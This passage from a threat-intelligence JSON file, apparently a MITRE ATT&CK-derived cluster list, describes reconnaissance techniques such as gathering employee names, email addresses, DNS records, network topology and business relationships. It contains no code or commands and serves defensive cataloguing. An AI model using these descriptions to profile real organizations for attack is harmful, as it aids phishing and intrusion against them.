public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[HackersArise Email](https://app.tidalcyber.com/references/b6aefd99-fd97-4ca0-b717-f9dc147c9413)][[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)] Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)] For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.[[GitHub Office 365 User Enumeration](https://app.tidalcyber.com/references/314fb591-d5f2-4f0c-ab0b-97977308b5dc)][[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)]\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Email Accounts](https://app.tidalcyber.com/technique/49ae7bf1-a313-41d6-ad4c-74efc4c80ab6)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1589.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "2eee984c-ea00-4284-b3eb-fd0c603a5a80", + "value": "Email Addresses" + }, + { + "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1589.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "72668851-bf65-42eb-a775-bc607f4520a2", + "value": "Employee Names" + }, + { + "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)] Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)][[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)][[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)][[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)][[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)][[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)][[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)][[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "e5d9c785-61bd-483f-b2ac-5bd9a8641b22", + "type": "similar" + }, + { + "dest-uuid": "2eee984c-ea00-4284-b3eb-fd0c603a5a80", + "type": "similar" + }, + { + "dest-uuid": "72668851-bf65-42eb-a775-bc607f4520a2", + "type": "similar" + } + ], + "uuid": "aea36489-047e-4c4a-ab26-c51fd3556182", + "value": "Gather Victim Identity Information" + }, + { + "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.[[Sean Metcalf Twitter DNS Records](https://app.tidalcyber.com/references/c7482430-58f9-4365-a7c6-d17067b257e4)]\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://app.tidalcyber.com/technique/758ad44d-5e29-4c7f-8dae-ddfeb5092ccb). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)][[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1590.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "cb4ec901-fe61-4b44-8ad7-7d3d9a9bc809", + "value": "DNS" + }, + { + "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://app.tidalcyber.com/technique/ef55dc56-f2eb-4a3b-a271-3f73b4700c89)).[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)][[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)][[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)] Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.[[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)][[Office 265 Azure Domain Availability](https://app.tidalcyber.com/references/dddf33ea-d074-4bc4-98d2-39b7e843e37d)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1590.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "ec145032-4b1b-4dbe-85bf-47360e35b0a3", + "value": "Domain Properties" + }, + { + "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)][[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)][[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1590.005" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "5c3c8da1-ed0c-4b79-9794-c2fc55588ad9", + "value": "IP Addresses" + }, + { + "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06).[[Nmap Firewalls NIDS](https://app.tidalcyber.com/references/c696ac8c-2c7a-4708-a369-0832a493e0a6)] Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1590.006" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "c60e4f32-d8f0-49e8-b0f7-57a6ae35b8bb", + "value": "Network Security Appliances" + }, + { + "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1590.004" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "afe743a7-56b0-4ad1-bd36-dd50d64802fc", + "value": "Network Topology" + }, + { + "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).[[Pentesting AD Forests](https://app.tidalcyber.com/references/3ca2e78e-751e-460b-9f3c-f851d054bce4)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1590.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "454be621-ea64-409c-981f-809f1238e21c", + "value": "Network Trust Dependencies" + }, + { + "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)][[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)][[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "cb4ec901-fe61-4b44-8ad7-7d3d9a9bc809", + "type": "similar" + }, + { + "dest-uuid": "ec145032-4b1b-4dbe-85bf-47360e35b0a3", + "type": "similar" + }, + { + "dest-uuid": "5c3c8da1-ed0c-4b79-9794-c2fc55588ad9", + "type": "similar" + }, + { + "dest-uuid": "c60e4f32-d8f0-49e8-b0f7-57a6ae35b8bb", + "type": "similar" + }, + { + "dest-uuid": "afe743a7-56b0-4ad1-bd36-dd50d64802fc", + "type": "similar" + }, + { + "dest-uuid": "454be621-ea64-409c-981f-809f1238e21c", + "type": "similar" + } + ], + "uuid": "58776ca9-0c54-487f-afcc-e7e5b661bd54", + "value": "Gather Victim Network Information" + }, + { + "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1591.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "9bd53629-fa2c-417d-b937-c575504be5b1", + "value": "Business Relationships" + }, + { + "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45)).[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)][[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1591.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "d93b51df-014a-4d46-949a-4b8f796e6cca", + "value": "Determine Physical Locations" + }, + { + "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf))", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1591.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "1f28a8a5-7231-47ad-9943-73b3cc6d05b0", + "value": "Identify Business Tempo" + }, + { + "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1591.004" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "63a99eb9-0da7-4286-bfc9-c306a03abf24", + "value": "Identify Roles" + }, + { + "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)][[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Trusted 